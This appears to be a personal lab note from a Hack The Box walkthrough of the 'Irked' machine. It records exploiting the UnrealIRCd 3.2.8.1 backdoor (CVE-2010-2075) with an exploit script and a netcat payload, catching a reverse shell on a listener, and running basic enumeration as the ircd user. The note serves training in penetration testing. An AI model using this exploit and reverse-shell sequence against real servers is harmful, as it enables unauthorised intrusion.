InfoSec LAB

Irked_Exploitation

Created: 1 min read

Exploitation

During the enumeration phase, it was discovered that the target IRC server is running UnrealIRCd 3.2.8.1, which is [[Irked_CVE-2010-2075#CVE-2010-2075|vulnerable]] to RCE

┌──(kali㉿kali)-[~/archive/htb/labs/irked]
└─$ ./CVE-2010-2075.py -payload netcat $IP 6697
Exploit sent successfully!

Firing up the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/irked]
└─$ nnc 9999            
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.117] 57609
 
whoami
ircd
hostname
irked
ifconfig
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:3e:78 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.117/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:3e78/64 scope global mngtmpaddr dynamic 
       valid_lft 86399sec preferred_lft 14399sec
    inet6 fe80::250:56ff:feb9:3e78/64 scope link 
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the ircd user by exploiting CVE-2010-2075 on the target IRC application

Interactive Graph View

Backlinks